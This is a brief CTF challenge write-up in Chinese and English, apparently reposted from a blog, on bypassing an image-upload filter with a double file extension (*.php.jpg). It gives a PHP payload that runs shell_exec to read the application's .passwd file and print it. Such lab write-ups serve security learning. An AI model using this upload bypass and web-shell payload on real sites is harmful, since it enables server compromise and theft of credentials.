提示:Your goal is to hack this photo galery by uploading PHP code.
Retrieve the validation password in the file .passwd at the root of the application.
你的目标是通过上传PHP代码来破解这些图片。在应用程序根目录下的.passwd文件中检索验证密码。
再加上Double extensions--------------------->双后缀名
因此直接上传*.php.jpg ,其将会以php脚本形式运行
payload:
<?php
$a = shell_exec("cat ../../../.passwd");
echo "</pre>$a</pre>";
?>
File upload - Double extensions
原文:https://www.cnblogs.com/abbin-blog/p/12073293.html